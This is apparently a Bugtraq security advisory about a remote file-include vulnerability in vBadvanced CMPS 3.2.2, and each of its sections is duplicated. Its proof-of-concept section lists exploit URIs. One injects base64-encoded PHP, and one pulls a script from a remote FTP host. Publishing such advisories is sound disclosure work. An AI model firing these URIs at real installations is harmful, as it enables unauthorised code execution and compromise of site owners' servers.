vBadvanced CMPS 'vba_cmps_include_bottom.php' Remote File Include Vulnerability
BID:51672
Info
vBadvanced CMPS 'vba_cmps_include_bottom.php' Remote File Include Vulnerability
| Bugtraq ID: | 51672 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jan 25 2012 12:00AM |
| Updated: | Jan 25 2012 12:00AM |
| Credit: | PacketiK |
| Vulnerable: |
vBadvanced vBadvanced CMPS 3.2.2 |
| Not Vulnerable: | |
Discussion
vBadvanced CMPS 'vba_cmps_include_bottom.php' Remote File Include Vulnerability
vBadvanced CMPS is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to execute arbitrary local and remote scripts in the context of the affected application or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
vBadvanced CMPS 3.2.2 is vulnerable; other versions may also be affected.
vBadvanced CMPS is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to execute arbitrary local and remote scripts in the context of the affected application or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
vBadvanced CMPS 3.2.2 is vulnerable; other versions may also be affected.
Exploit / POC
vBadvanced CMPS 'vba_cmps_include_bottom.php' Remote File Include Vulnerability
An attacker can exploit these issues with a browser.
The following example URIs are available:
http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4=
http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:[email protected]/123.txt
An attacker can exploit these issues with a browser.
The following example URIs are available:
http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4=
http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:[email protected]/123.txt